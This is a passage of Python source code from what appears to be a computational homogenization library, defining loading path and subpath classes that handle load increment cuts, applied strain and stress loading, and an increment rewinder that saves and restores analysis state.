constraints in a numpy.ndarray of shape (n_comps,).\n inc_mac_load_mf : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the incremental loading constraint matricial form in a\n numpy.ndarray of shape (n_comps,).\n n_presc_strain : int\n Number of prescribed macroscale loading strain components.\n presc_strain_idxs : list[int]\n Prescribed macroscale loading strain components indexes.\n n_presc_stress : int\n Number of prescribed macroscale loading stress components.\n presc_stress_idxs : list[int]\n Prescribed macroscale loading stress components indexes.\n is_last_inc : bool\n Loading last increment flag.\n \"\"\"\n # Get display features\n indent = ioutil.setdisplayfeatures()[2]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get current loading subpath\n load_subpath = self._get_load_subpath()\n # Perform loading increment\n load_subpath.increment_cut()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Set last macroscale loading increment flag\n self._is_last_inc = False\n # Increment (+1) consecutive loading increment cuts counter\n self._n_cinc_cuts += 1\n # Check if maximum number of consecutive loading increment cuts is\n # surpassed\n if self._n_cinc_cuts > self._max_cinc_cuts:\n summary = 'Maximum number of consecutive loading increment cuts'\n description = 'Maximum number of macroscale loading consecutive ' \\\n + 'increment cuts ({}) has been reached' + '\\n' \\\n + indent + 'without solution convergence.'\n info.displayinfo('4', summary, description, self._max_cinc_cuts)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current applied loading\n applied_mac_load = self._get_applied_mac_load()\n applied_mac_load_mf = {}\n for ltype in applied_mac_load.keys():\n applied_mac_load_mf[ltype] = type(self)._get_load_mf(\n self._n_dim, comp_order, applied_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute incremental loading\n inc_mac_load = self._get_inc_mac_load()\n inc_mac_load_mf = {}\n for ltype in inc_mac_load.keys():\n inc_mac_load_mf[ltype] = type(self)._get_load_mf(\n n_dim, comp_order, inc_mac_load[ltype])\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return applied_mac_load_mf, inc_mac_load_mf, \\\n load_subpath._n_presc_strain, load_subpath._presc_strain_idxs, \\\n load_subpath._n_presc_stress, load_subpath._presc_stress_idxs, \\\n self._is_last_inc\n # -------------------------------------------------------------------------\n def update_hom_state(self, hom_strain_mf, hom_stress_mf):\n \"\"\"Update converged homogenized state.\n\n Parameters\n ----------\n hom_strain_mf : numpy.ndarray (1d)\n Homogenized strain tensor stored in matricial form.\n hom_stress_mf : numpy.ndarray (1d)\n Homogenized stress tensor stored in matricial form.\n \"\"\"\n # Set strain/stress components order according to problem strain\n # formulation\n if self._strain_formulation == 'infinitesimal':\n comp_order = self._comp_order_sym\n elif self._strain_formulation == 'finite':\n comp_order = self._comp_order_nsym\n else:\n raise RuntimeError('Unknown problem strain formulation.')\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Build homogenized strain tensor\n hom_strain = mop.get_tensor_from_mf(hom_strain_mf, self._n_dim,\n comp_order)\n # Build homogenized stress tensor\n hom_stress = mop.get_tensor_from_mf(hom_stress_mf, self._n_dim,\n comp_order)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Initialize converged homogenized strain and stress tensors vector\n # form\n self._conv_hom_state['strain'] = np.zeros(len(comp_order))\n self._conv_hom_state['stress'] = np.zeros(len(comp_order))\n # Loop over strain/stress components\n for k in range(len(comp_order)):\n # Get strain/stress component\n comp = comp_order[k]\n # Get component indexes\n i = int(comp[0]) - 1\n j = int(comp[1]) - 1\n # Build converged homogenized strain and stress tensors vector form\n self._conv_hom_state['strain'][k] = hom_strain[i, j]\n self._conv_hom_state['stress'][k] = hom_stress[i, j]\n # -------------------------------------------------------------------------\n def get_subpath_state(self):\n \"\"\"Get current loading subpath state.\n\n Returns\n -------\n id : int\n Loading subpath id.\n inc : int\n Current loading subpath increment counter.\n total_lfact : float\n Current loading subpath current total load factor.\n inc_lfact : float\n Current loading subpath current incremental load factor.\n total_time : float\n Current loading subpath current total time.\n inc_time : float\n Current loading subpath current incremental time.\n sub_inc_level : int\n Current loading subpath current subincrementation level.\n \"\"\"\n # Get current loading subpath\n load_subpath = self._get_load_subpath()\n # Return loading subpath state\n return load_subpath.get_state()\n # -------------------------------------------------------------------------\n def get_increm_state(self):\n \"\"\"Get incremental state.\n\n Returns\n -------\n increm_state : dict\n Increment state: key `inc` contains the current increment number,\n key `subpath_id` contains the current loading subpath index.\n \"\"\"\n return copy.deepcopy(self._increm_state)\n # -------------------------------------------------------------------------\n def _new_subpath(self):\n \"\"\"Add a new loading subpath to the loading path.\"\"\"\n # Increment (+1) loading subpath id\n self._increm_state['subpath_id'] += 1\n subpath_id = self._increm_state['subpath_id']\n # Get load and prescription types of the current loading subpath\n presctype = self._mac_load_presctype[:, subpath_id]\n load = {key: np.zeros(self._mac_load[key].shape[0])\n for key in self._mac_load.keys() if key in presctype}\n for ltype in load.keys():\n load[ltype] = self._mac_load[ltype][:, 1 + subpath_id]\n # Get loading subpath incremental load factors and incremental times\n inc_lfacts = list(self._mac_load_increm[str(subpath_id)][:, 0])\n inc_times = list(self._mac_load_increm[str(subpath_id)][:, 1])\n # Add a new loading subpath\n self._load_subpaths.append(\n LoadingSubpath(subpath_id, self._strain_formulation,\n self._problem_type, self._conv_hom_state,\n load, presctype, inc_lfacts, inc_times,\n self._max_subinc_level))\n # -------------------------------------------------------------------------\n def _get_load_subpath(self):\n \"\"\"Get current loading subpath.\n\n Returns\n -------\n load_subpath : LoadingSubpath\n Current loading subpath.\n \"\"\"\n return self._load_subpaths[self._increm_state['subpath_id']]\n # -------------------------------------------------------------------------\n def _update_inc(self):\n \"\"\"Update loading increment counters.\"\"\"\n # Increment (+1) global increment counter\n self._increm_state['inc'] += 1\n # Increment (+1) loading subpath increment counter\n self._get_load_subpath().update_inc()\n # -------------------------------------------------------------------------\n def _get_applied_mac_load(self):\n \"\"\"Compute current applied loading.\n\n Returns\n -------\n applied_mac_load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n \"\"\"\n # Get current applied loading\n applied_mac_load = self._get_load_subpath().get_applied_load()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return applied_mac_load\n # -------------------------------------------------------------------------\n def _get_inc_mac_load(self):\n \"\"\"Compute current incremental loading.\n\n Returns\n -------\n inc_mac_load : dict\n For each loading nature type (key, {'strain', 'stress'}), stores\n the incremental loading constraint in a numpy.ndarray of shape\n (n_comps,).\n \"\"\"\n # Get current incremental loading\n inc_mac_load = self._get_load_subpath().get_inc_applied_load()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return inc_mac_load\n # -------------------------------------------------------------------------\n def _remove_sym(self, comp_order_sym, comp_order_nsym):\n \"\"\"Remove the symmetric components of loading related objects.\n\n Under an infinitesimal strain formulation, remove the symmetric\n strain/stress components of loading related objects. In addition, the\n remaining independent components are sorted according to the problem\n strain/stress symmetric component order.\n\n ----\n\n Parameters\n ----------\n comp_order_sym : list[str]\n Symmetric strain/stress components (str) order.\n comp_order_nsym : list[str]\n Nonsymmetric strain/stress components (str) order.\n \"\"\"\n # Copy loading objects\n mac_load_cp = copy.deepcopy(self._mac_load)\n mac_load_presctype_cp = copy.deepcopy(self._mac_load_presctype)\n # Loop over symmetric components indexes\n for i in range(len(comp_order_sym)):\n # Get non-symmetric component index\n j = comp_order_nsym.index(comp_order_sym[i])\n # Assemble symmetric components\n for ltype in self._mac_load.keys():\n if ltype in self._mac_load_presctype:\n self._mac_load[ltype][i, :] = mac_load_cp[ltype][j, :]\n self._mac_load_presctype[i, :] = mac_load_presctype_cp[j, :]\n # Remove (non-symmetric) additional components\n n_sym = len(comp_order_sym)\n for ltype in self._mac_load.keys():\n if ltype in self._mac_load_presctype:\n self._mac_load[ltype] = self._mac_load[ltype][0:n_sym, :]\n self._mac_load_presctype = self._mac_load_presctype[:n_sym, :]\n # -------------------------------------------------------------------------\n @staticmethod\n def _get_load_mf(n_dim, comp_order, load_vector):\n \"\"\"Get matricial form of load tensor given in vector form.\n\n Parameters\n ----------\n comp_order : list[str]\n Strain/Stress components (str) order.\n load_vector : numpy.ndarray (1d)\n Loading tensor in vector form (numpy.ndarray of shape (n_comps,)).\n\n Returns\n -------\n load_mf : numpy.ndarray (1d)\n Loading tensor matricial form (numpy.ndarray of shape (n_comps,)).\n \"\"\"\n # Initialize incremental macroscale load tensor\n load_matrix = np.zeros((n_dim, n_dim))\n # Build incremental macroscale load tensor\n for j in range(n_dim):\n for i in range(0, j + 1):\n load_matrix[i, j] = \\\n load_vector[comp_order.index(str(i + 1) + str(j + 1))]\n if i != j:\n if n_dim**2 == len(comp_order):\n load_matrix[j, i] = load_vector[\n comp_order.index(str(j + 1) + str(i + 1))]\n else:\n load_matrix[j, i] = load_matrix[i, j]\n # Set incremental macroscopic load matricial form\n load_mf = mop.get_tensor_mf(load_matrix, n_dim, comp_order)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n return load_mf\n# =============================================================================\nclass LoadingSubpath:\n \"\"\"Loading subpath.\n\n Attributes\n ----------\n _n_dim : int\n Problem number of spatial dimensions.\n _comp_order_sym : list[str]\n Strain/Stress components symmetric order.\n _comp_order_nsym : list[str]\n Strain/Stress components nonsymmetric order.\n _inc : int\n Loading subpath increment counter.\n _total_lfact : float\n Loading subpath total load factor.\n _total_time : float\n Loading subpath total time.\n _n_presc_strain : int\n Number of prescribed loading strain components.\n _n_presc_stress : int\n Number of prescribed loading stress components.\n _presc_strain_idxs : list[int]\n Prescribed loading strain components indexes.\n _presc_stress_idxs : list[int]\n Prescribed loading stress components indexes.\n _applied_load : dict\n For each prescribed loading nature type (key, {'strain', 'stress'}),\n stores the current applied loading constraints in a numpy.ndarray of\n shape (n_comps,).\n _inc_applied_load : dict\n For each prescribed loading nature type (key, {'strain', 'stress'}),\n stores the current incremental applied loading constraints in a\n numpy.ndarray of shape (n_comps,).\n _is_last_subpath_inc : bool\n Loading subpath last increment flag.\n _sub_inc_levels : list\n History of subincrementation levels.\n\n Methods\n -------\n get_state(self)\n Get loading subpath state data.\n update_inc(self)\n Update increment counter, total load factor and applied loading.\n increment_cut(self)\n Perform loading increment cut.\n get_applied_load(self)\n Get current applied loading.\n get_inc_applied_load(self)\n Get current incremental applied loading.\n _update_inc_applied_load(self)\n Update current incremental applied loading.\n \"\"\"\n def __init__(self, id, strain_formulation, problem_type,\n init_conv_hom_state, load, presctype, inc_lfacts, inc_times,\n max_subinc_level):\n \"\"\"Constructor.\n\n Parameters\n ----------\n id : int\n Loading subpath id.\n strain_formulation: {'infinitesimal', 'finite'}\n Problem strain formulation.\n problem_type : int\n Problem type: 2D plane strain (1), 2D plane stress (2),\n 2D axisymmetric (3) and 3D (4).\n init_conv_hom_state : dict\n Converged homogenized state (item, numpy.ndarray of shape\n (n_comps,)) for key in {'strain', 'stress'} at the beginning of\n loading subpath.\n load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the loading constraints in a\n numpy.ndarray of shape (n_comps,).\n presctype : numpy.ndarray (1d)\n Loading nature type ({'strain', 'stress'}) associated with\n each macroscale loading constraint (numpy.ndarray of shape\n (n_comps,)).\n inc_lfacts : numpy.ndarray (1d)\n Loading subpath incremental load factors (numpy.ndarray of shape\n (n_increments,)).\n inc_times : numpy.ndarray (1d)\n Loading subpath incremental times (numpy.ndarray of shape\n (n_increments,)).\n max_subinc_level : int\n Maximum level of loading subincrementation.\n \"\"\"\n self._id = id\n self._strain_formulation = strain_formulation\n self._problem_type = problem_type\n self._init_conv_hom_state = copy.deepcopy(init_conv_hom_state)\n self._load = copy.deepcopy(load)\n self._presctype = copy.deepcopy(presctype)\n self._inc_lfacts = copy.deepcopy(inc_lfacts)\n self._inc_times = copy.deepcopy(inc_times)\n self._max_subinc_level = max_subinc_level\n # Get problem type parameters\n n_dim, comp_order_sym, comp_order_nsym = \\\n mop.get_problem_type_parameters(problem_type)\n self._n_dim = n_dim\n self._comp_order_sym = comp_order_sym\n self._comp_order_nsym = comp_order_nsym\n # Initialize loading subpath increment counter\n self._inc = 0\n # Initialize loading subpath total load factor\n self._total_lfact = 0\n # Initialize loading subpath total time\n self._total_time = 0\n # Set number of prescribed loading strain and stress components and\n # associated indexes\n self._n_presc_strain = sum([x == 'strain' for x in self._presctype])\n self._n_presc_stress = sum([x == 'stress' for x in self._presctype])\n self._presc_strain_idxs = []\n self._presc_stress_idxs = []\n for i in range(len(presctype)):\n if presctype[i] == 'strain':\n self._presc_strain_idxs.append(i)\n else:\n self._presc_stress_idxs.append(i)\n # Initialize current applied and incremental applied loading\n self._applied_load = {key: np.zeros(load[key].shape[0])\n for key in load.keys()}\n self._inc_applied_load = {key: np.zeros(load[key].shape[0])\n for key in load.keys()}\n # Initialize loading subpath last increment flag\n self._is_last_subpath_inc = False\n # Initialize subincrementation levels\n self._sub_inc_levels = [0]*len(self._inc_lfacts)\n # -------------------------------------------------------------------------\n def get_state(self):\n \"\"\"Get loading subpath state data.\n\n Returns\n -------\n id : int\n Loading subpath id.\n inc : int\n Loading subpath increment counter.\n total_lfact : float\n Loading subpath current total load factor.\n inc_lfact : float\n Loading subpath current incremental load factor.\n total_time : float\n Loading subpath current total time.\n inc_time : float\n Loading subpath current incremental time.\n sub_inc_level : int\n Loading subpath current subincrementation level.\n \"\"\"\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # Return\n return self._id, self._inc, self._total_lfact, \\\n self._inc_lfacts[inc_idx], self._total_time, \\\n self._inc_times[inc_idx], self._sub_inc_levels[inc_idx]\n # -------------------------------------------------------------------------\n def update_inc(self):\n \"\"\"Update increment counter, total load factor and applied loading.\"\"\"\n # Increment (+1) loading subpath increment counter\n self._inc += 1\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Procedure related with the loading subincrementation: upon\n # convergence of a given increment, guarantee that the following\n # increment magnitude is at most one (subincrementation) level above.\n # The increment cut procedure is performed the required number of times\n # in order to ensure this progressive recovery towards the prescribed\n # incrementation\n if self._inc > 1:\n while self._sub_inc_levels[inc_idx - 1] \\\n - self._sub_inc_levels[inc_idx] >= 2:\n self.increment_cut()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Update total load factor\n self._total_lfact = sum(self._inc_lfacts[0:self._inc])\n # Update total time\n self._total_time = sum(self._inc_times[0:self._inc])\n # Update current incremental applied loading\n self._update_inc_applied_load()\n # Check if last increment\n if self._inc == len(self._inc_lfacts):\n self._is_last_subpath_inc = True\n # -------------------------------------------------------------------------\n def increment_cut(self):\n \"\"\"Perform loading increment cut.\"\"\"\n # Get display features\n indent = ioutil.setdisplayfeatures()[2]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # Update subincrementation level\n self._sub_inc_levels[inc_idx] += 1\n self._sub_inc_levels.insert(inc_idx + 1, self._sub_inc_levels[inc_idx])\n # Check if maximum subincrementation level is surpassed\n if self._sub_inc_levels[inc_idx] > self._max_subinc_level:\n summary = 'Maximum loading subincrementation level'\n description = 'The maximum macroscale loading subincrementation ' \\\n + 'level ({}) has been reached without' + '\\n' \\\n + indent + 'solution convergence.'\n info.displayinfo('4', summary, description, self._max_subinc_level)\n # Get current incremental load factor and associated incremental time\n inc_lfact = self._inc_lfacts[inc_idx]\n inc_time = self._inc_times[inc_idx]\n # Cut load increment in half\n self._inc_lfacts[inc_idx] = inc_lfact/2.0\n self._inc_lfacts.insert(inc_idx + 1, self._inc_lfacts[inc_idx])\n self._inc_times[inc_idx] = inc_time/2.0\n self._inc_times.insert(inc_idx + 1, self._inc_times[inc_idx])\n # Update total load factor and total time\n self._total_lfact = sum(self._inc_lfacts[0:self._inc])\n self._total_time = sum(self._inc_times[0:self._inc])\n # Update current incremental applied loading\n self._update_inc_applied_load()\n # Set loading subpath last increment flag\n self._is_last_subpath_inc = False\n # -------------------------------------------------------------------------\n def get_applied_load(self):\n \"\"\"Get current applied loading.\n\n Returns\n -------\n applied_load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current applied loading\n constraints in a numpy.ndarray of shape (n_comps,).\n \"\"\"\n return copy.deepcopy(self._applied_load)\n # -------------------------------------------------------------------------\n def get_inc_applied_load(self):\n \"\"\"Get current incremental applied loading.\n\n Returns\n -------\n inc_applied_load : dict\n For each prescribed loading nature type\n (key, {'strain', 'stress'}), stores the current incremental applied\n loading constraints in a numpy.ndarray of shape (n_comps,).\n \"\"\"\n return copy.deepcopy(self._inc_applied_load)\n # -------------------------------------------------------------------------\n def _update_inc_applied_load(self):\n \"\"\"Update current incremental applied loading.\n\n *Infinitesimal strains:*\n\n .. math::\n\n \\\\boldsymbol{\\\\varepsilon}_{n+1} =\n \\\\boldsymbol{\\\\varepsilon}_{0} + \\\\lambda_{n+1}\n (\\\\boldsymbol{\\\\varepsilon}^{\\\\text{total}} -\n \\\\boldsymbol{\\\\varepsilon}_{0})\n\n .. math::\n\n \\\\Delta \\\\boldsymbol{\\\\varepsilon}_{n+1} =\n \\\\Delta \\\\lambda_{n+1} (\\\\boldsymbol{\\\\varepsilon}^{\n \\\\text{total}} - \\\\boldsymbol{\\\\varepsilon}_{0})\n\n where :math:`\\\\boldsymbol{\\\\varepsilon}_{n+1}` is the current\n applied infinitesimal strain tensor, :math:`\\\\lambda_{n+1}` is the\n current load factor,\n :math:`\\\\boldsymbol{\\\\varepsilon}^{\\\\text{total}}` is the total\n infinitesimal strain tensor prescribed in the mononotic loading\n path, :math:`\\\\boldsymbol{\\\\varepsilon}_{0}` is the infinitesimal\n strain tensor at the beginning of the mononotic loading path,\n :math:`\\\\Delta \\\\boldsymbol{\\\\varepsilon}_{n+1}` is the\n incremental infinitesimal strain tensor,\n :math:`\\\\Delta \\\\lambda_{n+1}` is the incremental load factor, and\n :math:`n+1` denotes the current increment.\n\n .. math::\n\n \\\\boldsymbol{\\\\sigma}_{n+1} = \\\\boldsymbol{\\\\sigma}_{0} +\n \\\\lambda_{n+1} (\\\\boldsymbol{\\\\sigma}^{\\\\text{total}} -\n \\\\boldsymbol{\\\\sigma}_{0})\n\n .. math::\n\n \\\\Delta \\\\boldsymbol{\\\\sigma}_{n+1} = \\\\Delta \\\\lambda_{n+1}\n (\\\\boldsymbol{\\\\sigma}^{\\\\text{total}} -\n \\\\boldsymbol{\\\\sigma}_{0})\n\n where :math:`\\\\boldsymbol{\\\\sigma}_{n+1}` is the current applied\n Cauchy stress tensor, :math:`\\\\lambda_{n+1}` is the current load\n factor, :math:`\\\\boldsymbol{\\\\sigma}^{\\\\text{total}}` is the total\n Cauchy stress tensor prescribed in the mononotic loading path,\n :math:`\\\\boldsymbol{\\\\sigma}_{0}` is the Cauchy stress tensor at\n the beginning of the mononotic loading path,\n :math:`\\\\Delta \\\\boldsymbol{\\\\sigma}_{n+1}` is the incremental\n Cauchy stress tensor, :math:`\\\\Delta \\\\lambda_{n+1}` is the\n incremental load factor, and :math:`n+1` denotes the current\n increment.\n\n ----\n\n *Finite strains:*\n\n .. math::\n\n \\\\boldsymbol{F}_{n+1} = \\\\exp (\\\\lambda_{n+1} \\\\ln (\n \\\\boldsymbol{F}^{\\\\text{total}} \\\\boldsymbol{F}_{0}^{-1}))\n \\\\boldsymbol{F}_{0}\n\n .. math::\n\n \\\\boldsymbol{F}_{\\\\Delta, n+1} = \\\\exp (\\\\Delta \\\\lambda_{n+1}\n \\\\ln ( \\\\boldsymbol{F}^{\\\\text{total}}\n \\\\boldsymbol{F}_{0}^{-1}))\n\n where :math:`\\\\boldsymbol{F}_{n+1}` is the current applied\n deformation gradient, :math:`\\\\lambda_{n+1}` is the current load\n factor, :math:`\\\\boldsymbol{F}_{\\\\text{total}}` is the total\n deformation gradient prescribed in the mononotic loading path, and\n :math:`\\\\boldsymbol{F}_{0}` is the deformation gradient\n at the beginning of the mononotic loading path,\n :math:`\\\\boldsymbol{F}_{\\\\Delta, n+1}` is the incremental\n deformation gradient, :math:`\\\\Delta \\\\lambda_{n+1}` is the\n incremental load factor, and :math:`n+1` denotes the current\n increment.\n\n .. math::\n\n \\\\boldsymbol{P}_{n+1} = \\\\boldsymbol{P}_{0} + \\\\lambda_{n+1}\n (\\\\boldsymbol{P}^{\\\\text{total}} - \\\\boldsymbol{P}_{0})\n\n .. math::\n\n \\\\Delta \\\\boldsymbol{P}_{n+1} = \\\\Delta \\\\lambda_{n+1}\n (\\\\boldsymbol{P}^{\\\\text{total}} - \\\\boldsymbol{P}_{0})\n\n where :math:`\\\\boldsymbol{P}_{n+1}` is the current applied first\n Piola-Kirchhoff stress tensor, :math:`\\\\lambda_{n+1}` is the\n current load factor, :math:`\\\\boldsymbol{P}^{\\\\text{total}}` is the\n total first Piola-Kirchhoff stress tensor prescribed in the\n mononotic loading path, :math:`\\\\boldsymbol{P}_{0}` is the first\n Piola-Kirchhoff stress tensor at the beginning of the mononotic\n loading path, :math:`\\\\Delta \\\\boldsymbol{P}_{n+1}` is the\n incremental first Piola-Kirchhoff stress tensor,\n :math:`\\\\Delta \\\\lambda_{n+1}` is the incremental load factor, and\n :math:`n+1` denotes the current increment.\n\n **Remark**: It is not straightforward how to perform a\n component-wise multiplicative decomposition of the deformation\n gradient in the case of a mixed strain-stress loading prescription.\n \"\"\"\n # Get loading subpath current increment index\n inc_idx = self._inc - 1\n # Get current incremental load factor and associated incremental time\n inc_lfact = self._inc_lfacts[inc_idx]\n # Evaluate prescription type\n is_strain_only = 'stress' not in self._inc_applied_load.keys()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Update current incremental applied loading\n if self._strain_formulation == 'finite' and is_strain_only:\n # Initialize initial and total deformation gradient\n def_gradient_init = np.zeros((self._n_dim, self._n_dim))\n def_gradient_total = np.zeros((self._n_dim, self._n_dim))\n # Build initial and total deformation gradient\n for i in range(len(self._comp_order_nsym)):\n # Get component second-order index\n so_idx = tuple([int(x) - 1\n for x in list(self._comp_order_nsym[i])])\n # Build initial and total deformation gradient\n def_gradient_init[so_idx] = \\\n self._init_conv_hom_state['strain'][i]\n def_gradient_total[so_idx] = self._load['strain'][i]\n # Compute total incremental deformation gradient (multiplicative\n # decomposition)\n inc_def_gradient_total = np.matmul(\n def_gradient_total, np.linalg.inv(def_gradient_init))\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute incremental deformation gradient relative to initial\n # deformation gradient (multiplicative decomposition)\n inc_init_def_gradient = mop.matrix_root(inc_def_gradient_total,\n self._total_lfact)\n # Compute current applied deformation gradient\n applied_def_gradient = np.matmul(inc_init_def_gradient,\n def_gradient_init)\n # Store current applied deformation gradient components\n for i in range(len(self._comp_order_nsym)):\n # Get component second-order index\n so_idx = tuple([int(x) - 1\n for x in list(self._comp_order_nsym[i])])\n # Store current applied deformation gradient component\n self._applied_load['strain'][i] = applied_def_gradient[so_idx]\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Compute current incremental deformation gradient (multiplicative\n # decomposition)\n inc_def_gradient = mop.matrix_root(inc_def_gradient_total,\n inc_lfact)\n # Store current incremental deformation gradient components\n for i in range(len(self._comp_order_nsym)):\n # Get component second-order index\n so_idx = tuple([int(x) - 1\n for x in list(self._comp_order_nsym[i])])\n # Store incremental deformation gradient component\n self._inc_applied_load['strain'][i] = inc_def_gradient[so_idx]\n else:\n # Loop over prescription types\n for ltype in self._inc_applied_load.keys():\n # Loop over loading components\n for i in range(len(self._inc_applied_load[ltype])):\n # Compute current applied and incremental loading component\n # (additive decomposition)\n if self._presctype[i] == ltype:\n # Compute current applied loading component\n self._applied_load[ltype][i] = \\\n self._init_conv_hom_state[ltype][i] \\\n + self._total_lfact*(\n self._load[ltype][i]\n - self._init_conv_hom_state[ltype][i])\n # Compute current incremental loading component\n self._inc_applied_load[ltype][i] = \\\n inc_lfact*(self._load[ltype][i]\n - self._init_conv_hom_state[ltype][i])\n#\n# Loading path rewinder\n# =============================================================================\nclass IncrementRewinder:\n \"\"\"Rewind analysis to rewind state increment (initial instant).\n\n Attributes\n ----------\n _rewind_inc : int\n Increment associated with the rewind state.\n _loading_path : LoadingPath\n Loading path instance rewind state.\n _material_state : MaterialState\n CRVE material constitutive state at rewind state.\n _clusters_sct_mf : dict\n Fourth-order strain concentration tensor (matricial form)\n (item, numpy.ndarray (2d)) associated with each material cluster\n (key, str).\n _ref_material : ElasticReferenceMaterial\n Elastic reference material at rewind state.\n _global_strain_mf : numpy.ndarray (1d)\n Global vector of clusters strain tensors (matricial form).\n _farfield_strain_mf : numpy.ndarray (1d)\n Far-field strain tensor (matricial form).\n\n Methods\n -------\n get_rewind_inc(self)\n Get increment associated with the rewind state.\n save_loading_path(self, loading_path)\n Save loading path rewind state.\n get_loading_path(self)\n Get loading path at rewind state.\n save_material_state(self, material_state)\n Save material constitutive state at rewind state.\n save_asca_algorithmic_variables(self, global_strain_mf, \\\n farfield_strain_mf)\n Save ASCA algorithmic variables at rewind state.\n get_asca_algorithmic_variables(self)\n Get ASCA algorithmic variables at rewind state.\n rewind_output_files(self, hres_output=None, efftan_output=None, \\\n ref_mat_output=None, voxels_output=None, \\\n adapt_output=None, vtk_output=None)\n \"\"\"\n def __init__(self, rewind_inc, phase_clusters):\n \"\"\"Increment rewinder constructor.\n\n Parameters\n ----------\n rewind_inc : int\n Increment associated with the rewind state.\n phase_clusters : dict\n Clusters labels (item, list[int]) associated with each material\n phase (key, str).\n \"\"\"\n self._rewind_inc = rewind_inc\n self._phase_clusters = copy.deepcopy(phase_clusters)\n # Initialize loading path at rewind state\n self._loading_path = None\n # Initialize material constitutive state at rewind state\n self._material_state = None\n # Initialize elastic reference material at rewind state\n self._ref_material = None\n # Initialize clusters strain concentration tensors at rewind state\n self._clusters_sct_mf = None\n # Initialize ASCA algorithmic variables\n self._global_strain_mf = None\n self._farfield_strain_mf = None\n # -------------------------------------------------------------------------\n def get_rewind_inc(self):\n \"\"\"Get increment associated with the rewind state.\n\n Returns\n -------\n rewind_inc : int\n Increment associated with the rewind state.\n \"\"\"\n return self._rewind_inc\n # -------------------------------------------------------------------------\n def save_loading_path(self, loading_path):\n \"\"\"Save loading path rewind state.\n\n Parameters\n ----------\n loading_path : LoadingPath\n LoadingPath instance.\n \"\"\"\n self._loading_path = copy.deepcopy(loading_path)\n # -------------------------------------------------------------------------\n def get_loading_path(self):\n \"\"\"Get loading path at rewind state.\n\n Returns\n -------\n loading_path : LoadingPath\n Loading path instance rewind state.\n \"\"\"\n return copy.deepcopy(self._loading_path)\n # -------------------------------------------------------------------------\n def save_material_state(self, material_state):\n \"\"\"Save material constitutive state at rewind state.\n\n Parameters\n ----------\n material_state : MaterialState\n CRVE material constitutive state at rewind state.\n \"\"\"\n self._material_state = copy.deepcopy(material_state)\n # -------------------------------------------------------------------------\n def get_material_state(self, crve):\n \"\"\"Get material constitutive state at rewind state.\n\n Parameters\n ----------\n crve : CRVE\n Cluster-Reduced Representative Volume Element.\n\n Returns\n -------\n material_state : MaterialState\n CRVE material constitutive state at rewind state.\n \"\"\"\n # If the current CRVE clustering is coincident with the CRVE clustering\n # at the rewind state, simply return the material constitutive state\n # stored at rewind state. Otherwise, perform a suitable transfer of\n # state variables between the rewind state CRVE clustering and the\n # current CRVE clustering\n if self._phase_clusters == crve.get_cluster_phases():\n # Return material constitutive state stored at rewind state\n return copy.deepcopy(self._material_state)\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n else:\n # Get clusters state variables at rewind state\n clusters_state_rew = self._material_state.get_clusters_state()\n # Get clusters deformation gradient at rewind state\n clusters_def_gradient_rew_mf = \\\n self._material_state.get_clusters_def_gradient_mf()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Initialize clusters state variables\n clusters_state = {}\n # Initialize clusters deformation gradient\n clusters_def_gradient_mf = {}\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Get material phases\n material_phases = crve.get_material_phases()\n # Get cluster-reduced material phases\n cluster_phases = crve.get_cluster_phases()\n # Get clusters associated with each material phase\n phase_clusters = crve.get_phase_clusters()\n # Get clusters volume fraction\n clusters_vf = 